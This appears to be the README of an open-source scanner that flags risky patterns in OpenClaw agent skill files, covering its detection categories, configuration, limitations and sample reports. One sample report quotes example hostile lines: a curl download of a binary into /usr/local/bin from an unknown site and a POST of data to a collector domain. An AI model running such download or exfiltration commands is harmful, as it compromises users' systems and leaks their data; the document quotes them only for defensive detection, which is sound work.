Security Scanner
Description
A security-focused skill that analyzes OpenClaw SKILL.md files and skill packages for potential security risks, malicious patterns, and suspicious behaviors. This tool helps protect your system by detecting:
- Hidden external downloads or executables
- Suspicious API calls and endpoints
- Dangerous file system operations
- Obfuscated or encoded commands
- Unusual prerequisite requirements
- Known malicious patterns
Why this matters: This scanner helps you review skills before installation by flagging potentially suspicious instruction patterns.
Features
- ✅ Pattern Detection: Identifies suspicious code patterns and behaviors
- ✅ Prerequisite Analysis: Validates required dependencies and downloads
- ✅ API Endpoint Validation: Checks for suspicious external connections
- ✅ File System Auditing: Detects dangerous file operations
- ✅ Encoding Detection: Flags base64, hex, and other obfuscation attempts
- ✅ Risk Scoring: Assigns risk levels (LOW, MEDIUM, HIGH, CRITICAL)
- ✅ Detailed Reports: Provides clear explanations of findings
- ✅ Whitelist Support: Configure trusted domains and patterns
How It Works
This is an OpenClaw skill (not a standalone program). When you ask the agent to scan a skill file:
1. The agent reads this security-scanner skill to learn what patterns to look for
2. The agent reads the skill file you want to scan
3. The agent analyzes the instructions and reports findings
4. You manually review the flagged items
Note: The included scanner.js file can also be run directly with Node.js 18+ if you prefer command-line usage.
Installation
Install via ClawHub or add to your OpenClaw skills directory.
For command-line usage (optional):
```bash
# Clone the repository
git clone https://github.com/anikrahman0/security-skill-scanner.git
cd security-skill-scanner

# Run the scanner
node scanner.js path/to/SKILL.md
```
Configuration
Create a .security-scanner-config.json in your OpenClaw directory (optional):
```json
{
  "whitelistedDomains": [
    "github.com",
    "api.openai.com",
    "api.anthropic.com",
    "raw.githubusercontent.com"
  ],
  "whitelistedCommands": [
    "npm install",
    "pip install"
  ],
  "strictMode": false
}
```
Usage
Scan a SKILL.md file
```text
User: Scan the ~/Downloads/new-skill/SKILL.md file for security issues
Agent: [runs the security scan and reports findings]
```
Scan before installation
```text
User: I have an email automation skill file. Can you scan it for security risks?
[User uploads SKILL.md file]
Agent: [reads and analyzes the skill file, provides a risk assessment]
```
Important: If you ask Claude to download a skill from the internet first, that download step will use network access (though the scanner itself runs offline).
Batch scan all installed skills
```text
User: Scan all my installed OpenClaw skills for security issues
Agent: [scans every skill in ~/.openclaw/skills/ and generates a report]
```
What It Detects
🔴 CRITICAL Risks
- Shell command injection attempts
- External executable downloads (curl/wget binaries)
- Suspicious eval() or exec() usage
- Credential harvesting patterns
- Known malware signatures
🟠 HIGH Risks
- Unvalidated external API calls
- File system write access to sensitive directories
- Base64 or hex encoded commands
- Requests to unknown domains
- Privilege escalation attempts
🟡 MEDIUM Risks
- Extensive file system read access
- Network requests without HTTPS
- Large numbers of dependencies
- Unusual prerequisite requests
- Deprecated or vulnerable packages
🟢 LOW Risks
- Minor code quality issues
- Missing error handling
- Incomplete documentation
- Non-critical warnings
⚠️ IMPORTANT: False Positives & Limitations
This Scanner WILL Flag Legitimate Patterns
The scanner uses regex patterns that may match innocent code. Common false positives:
- ✗ Backticks in markdown - Code examples using backticks
- ✗ Template strings - Documentation showing `${variable}` syntax
- ✗ Base64 examples - Skills demonstrating encoding/decoding
- ✗ Package managers - Legitimate `npm install` or `pip install` commands
- ✗ GitHub URLs - Links to raw.githubusercontent.com
What This Actually Scans
Skills are markdown instruction files, not executable code. This scanner:
- ✅ Reads the markdown text of skill files
- ✅ Looks for instruction patterns that might be concerning
- ✅ Flags items for your manual review
- ❌ Does NOT scan for executable malware (skills aren't programs)
- ❌ Does NOT provide definitive verdicts
Your Responsibility
YOU must review all flagged items in context. Ask yourself:
- Does this pattern make sense for what the skill does?
- Is the author trustworthy?
- Are the instructions clear and reasonable?
When in doubt, ask the skill author or community.
Output Format
```text
=== Security Scan Report ===
Skill: Email Automation
Scan time: 2024-02-09 14:30:22
Overall risk: HIGH ⚠️

Findings:
[CRITICAL] External binary download detected
  Location: Prerequisites, line 45
  Pattern: curl https://unknown-site.com/tool -o /usr/local/bin/helper
  Risk: Downloads and executes an external binary from an untrusted source
  Recommendation: Do not install - manual verification required

[HIGH] Suspicious API endpoint
  Location: execute(), line 89
  Pattern: POST to http://data-collector.xyz/log
  Risk: Sends data to an unknown third-party server
  Recommendation: Review what data is sent

[MEDIUM] Unencrypted network request
  Location: line 102
  Pattern: Uses HTTP instead of HTTPS
  Risk: Data is transmitted unencrypted
  Recommendation: Request an HTTPS version

Summary:
Total issues: 3
Critical: 1
High: 1
Medium: 1
Low: 0

Recommendation: ❌ DO NOT INSTALL
This skill has critical security issues that pose a significant risk to your system.
```
Example Scenarios
Scenario 1: Clean Skill
```text
User: Scan the weather checker skill
Agent: ✅ SAFE - No security issues detected. This skill uses standard API calls
to api.weatherapi.com with proper HTTPS and no file system access.
```
Scenario 2: Suspicious Skill
```text
User: Should I install the productivity helper skill?
Agent: ⚠️ WARNING - This skill attempts to download an external binary and
makes requests to unknown domains. Risk level: CRITICAL
Recommendation: Do not install
```
Scenario 3: Minor Issues
```text
User: Analyze the note-taking skill
Agent: ⚠️ CAUTION - Risk level: LOW
Found 2 minor issues:
- Uses HTTP instead of HTTPS for icon download
- Missing input validation for file paths
These are probably fixable. Consider contacting the author.
```
Security Guarantees
This scanner itself is designed with security in mind:
- ✅ No Network Access: The scanner itself runs completely offline (but if you ask Claude to download a skill file first, that download uses the network)
- ✅ No External Dependencies: Pure JavaScript/Node.js
- ✅ Read-Only: Never modifies files being scanned
- ✅ No Telemetry: Doesn't send data anywhere
- ✅ Open Source: All code is auditable
- ✅ Sandboxed: Doesn't execute code from scanned skills
False Positives
The scanner may flag legitimate uses of certain patterns. Common false positives:
- npm/pip installs: Legitimate package managers may trigger warnings
- GitHub URLs: Raw GitHub content URLs are generally safe
- Config files: Skills that write to config files may be flagged
- Log files: Creating log files may trigger file system warnings
Use judgment and review flagged items in context.
Limitations
- Cannot detect zero-day exploits or novel attack vectors
- May miss sophisticated obfuscation techniques
- Requires human judgment for final decision
- Cannot scan encrypted or compiled code
- Pattern-based detection can have false positives
This tool is a helpful first line of defense, but not a replacement for careful review.
Contributing
Found a malicious pattern not detected? Submit an issue or PR with:
- The malicious pattern
- Example skill that uses it
- Suggested detection method
Roadmap
- [ ] Machine learning-based pattern detection
- [ ] Integration with VirusTotal API (optional)
- [ ] Automatic skill reputation checking
- [ ] Community-sourced malware signatures
- [ ] Browser extension for ClawHub.ai scanning
- [ ] CI/CD integration for skill developers
Support
- Report issues: https://github.com/anikrahman0/security-skill-scanner/issues
- Suggest improvements: Pull requests welcome
- Security concerns: a7604366@gmail.com
License
MIT License - Free to use, modify, and distribute
Disclaimer
This tool provides pattern-based security scanning with expected false positives. It scans instruction files (markdown), not executable code.
Critical: This scanner cannot provide definitive security verdicts. All flagged items require manual review in context. Skills are instructions for Claude to read, not programs that execute automatically.
Always review skills carefully before installation, especially those requiring system-level permissions. The authors are not responsible for any damages resulting from use of this tool or installation of scanned skills.
Remember: If a skill seems too good to be true or requests unusual permissions, it probably is suspicious. When in doubt, don't install it.